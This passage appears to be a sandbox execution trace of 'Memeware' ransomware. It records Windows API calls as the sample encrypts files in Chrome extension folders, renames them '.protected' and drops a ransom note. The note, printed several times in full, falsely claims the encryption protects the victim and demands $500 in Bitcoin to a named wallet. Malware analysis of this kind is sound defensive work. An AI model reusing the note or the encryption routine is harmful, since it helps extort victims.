NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.075] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.076] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.076] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.076] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.076] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.077] CloseHandle (hObject=0x164) returned 1 [0081.077] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.077] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0081.077] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0081.077] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0081.077] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0081.077] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0081.077] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id") returned 145 [0081.077] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0081.077] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0081.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\*") returned 147 [0081.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.077] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.077] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.077] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.077] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.077] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\.") returned 147 [0081.077] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.077] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.078] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.078] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.078] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.078] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.078] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.078] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\..") returned 148 [0081.078] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.078] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.078] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.078] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.078] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.078] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.078] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.078] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.078] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json") returned 159 [0081.078] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.078] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.078] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.078] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json") returned 159 [0081.079] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json") returned 159 [0081.079] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json") returned 159 [0081.079] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.079] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0081.082] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.082] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x269, lpOverlapped=0x0) returned 1 [0081.082] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.083] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.083] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.083] CloseHandle (hObject=0x168) returned 1 [0081.083] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.protected") returned 169 [0081.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.protected")) returned 1 [0081.084] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.084] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.084] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\RESTORE_FILES.txt") returned 163 [0081.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.086] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.086] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.087] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.087] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.087] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.087] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.087] CloseHandle (hObject=0x164) returned 1 [0081.087] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.087] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0081.087] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0081.087] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0081.087] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0081.087] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0081.087] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it") returned 145 [0081.087] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0081.087] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0081.087] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\*") returned 147 [0081.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.088] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.088] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.088] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.088] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.088] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.088] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\.") returned 147 [0081.088] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.088] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.088] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.088] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.088] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.088] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.088] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.088] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\..") returned 148 [0081.088] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.088] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.088] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.088] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.088] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json") returned 159 [0081.088] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.088] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.088] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.088] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json") returned 159 [0081.090] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json") returned 159 [0081.090] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json") returned 159 [0081.090] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.090] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x26e, lpOverlapped=0x0) returned 1 [0081.091] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd92, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.091] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x26e, lpOverlapped=0x0) returned 1 [0081.091] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.091] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.092] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.092] CloseHandle (hObject=0x168) returned 1 [0081.092] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.protected") returned 169 [0081.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.protected")) returned 1 [0081.093] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.093] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.093] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\RESTORE_FILES.txt") returned 163 [0081.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.093] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour 